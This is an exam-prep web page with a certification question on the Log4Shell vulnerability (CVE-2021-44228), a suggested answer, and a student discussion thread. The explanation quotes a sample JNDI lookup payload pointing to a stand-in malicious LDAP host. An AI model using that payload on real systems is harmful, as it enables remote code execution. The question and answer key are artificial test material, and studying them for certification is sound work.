Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

The SecOps Group CAP Exam - Topic 12 Question 95 Discussion

Actual exam question for The SecOps Group's CAP exam
Question #: 95
Topic #: 12
[All CAP Questions]

In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?

Show Suggested Answer Hide Answer
Suggested Answer: B

The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.


by Sharen at Jun 11, 2025, 10:39 AM

Limited Time Offer

25%

Off

Get Premium CAP Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

0/2000 characters
Submit Cancel
Edwin
5 months ago
I thought there were other vulnerabilities involved too?
upvoted 0 times
...
Beckie
5 months ago
Wait, are we sure it's not something else?
upvoted 0 times
...
Ernest
5 months ago
It's definitely JNDI Injection!
upvoted 0 times
...
Cristy
6 months ago
Totally agree, that's the main exploit here.
upvoted 0 times
...
Lea
6 months ago
JNDI Injection all the way! No doubt about it.
upvoted 0 times
...
Joni
6 months ago
I thought there was something about JNDI Injection being exploited, but I can't remember if it was all the same or if there were different types.
upvoted 0 times
...
Colby
6 months ago
I'm a bit unsure, but I remember JNDI being a key part of the log4j vulnerability. Maybe it's option A?
upvoted 0 times
...
Gregoria
7 months ago
I recall practicing a question about JNDI Injection in relation to log4j, so I feel like it has to be one of those answers.
upvoted 0 times
...
Marti
7 months ago
I think the answer is JNDI Injection, but I can't remember if it's specifically one of the options listed.
upvoted 0 times
...
Joye
7 months ago
The answer is definitely JNDI Injection. I studied this vulnerability extensively, so I'm confident that's the right choice.
upvoted 0 times
...
Rory
7 months ago
I'm a little confused by this question. I'll need to think it through carefully and make sure I understand the details before answering.
upvoted 0 times
...
Noah
7 months ago
JNDI Injection sounds right to me. That's the key vulnerability that allowed the remote code execution, if I remember correctly.
upvoted 0 times
...
Xochitl
8 months ago
Hmm, I'm a bit unsure about this one. I'll need to review the details of the log4j vulnerability again to be confident in my answer.
upvoted 0 times
...
Rosita
8 months ago
I'm pretty sure the answer is JNDI Injection, since that's the vulnerability that was exploited in the log4j incident.
upvoted 0 times
...
Michael
10 months ago
D) None of the above - just kidding, it's clearly JNDI Injection. I'd have to be log4j-less to get this one wrong.
upvoted 0 times
...
Ronald
10 months ago
JNDI Injection, JNDI Injection, JNDI Injection... talk about a one-trick pony of an exam question!
upvoted 0 times
...
Ahmed
10 months ago
Hmm, all the options say JNDI Injection. I guess the exam writers really want to drive that point home!
upvoted 0 times
Kami
8 months ago
Hmm, all the options say JNDI Injection. I guess the exam writers really want to drive that point home!
upvoted 0 times
...
Jennifer
9 months ago
C) JNDI Injection
upvoted 0 times
...
Marguerita
9 months ago
B) JNDI Injection
upvoted 0 times
...
Carmela
10 months ago
A) JNDI Injection
upvoted 0 times
...
...
Sanda
11 months ago
I'm not sure, but I think it's A) JNDI Injection as well. It makes sense given the nature of the log4j vulnerability.
upvoted 0 times
...
Bettyann
11 months ago
B) JNDI Injection - I learned about this in my security training. Definitely the correct answer.
upvoted 0 times
Lonny
9 months ago
D) None of the above - Actually, it is JNDI Injection that is exploited for Remote Code Execution.
upvoted 0 times
...
Wava
10 months ago
B) JNDI Injection - Yes, that's the one! It's crucial to be aware of these vulnerabilities.
upvoted 0 times
...
Amie
10 months ago
A) JNDI Injection - That's correct! It's the vulnerability exploited in the backend for Remote Code Execution.
upvoted 0 times
...
...
Marva
11 months ago
I agree with Louvenia, JNDI Injection is the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
Merissa
11 months ago
JNDI Injection for sure! That's the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
Reta
10 months ago
Definitely JNDI Injection, that's what enables the exploit to achieve Remote Code Execution.
upvoted 0 times
...
Fausto
10 months ago
Yes, JNDI Injection is the key vulnerability that allows the log4j exploit to work.
upvoted 0 times
...
Ming
10 months ago
JNDI Injection is definitely the vulnerability exploited for Remote Code Execution.
upvoted 0 times
...
...
Louvenia
11 months ago
I think the answer is A) JNDI Injection.
upvoted 0 times
...

Save Cancel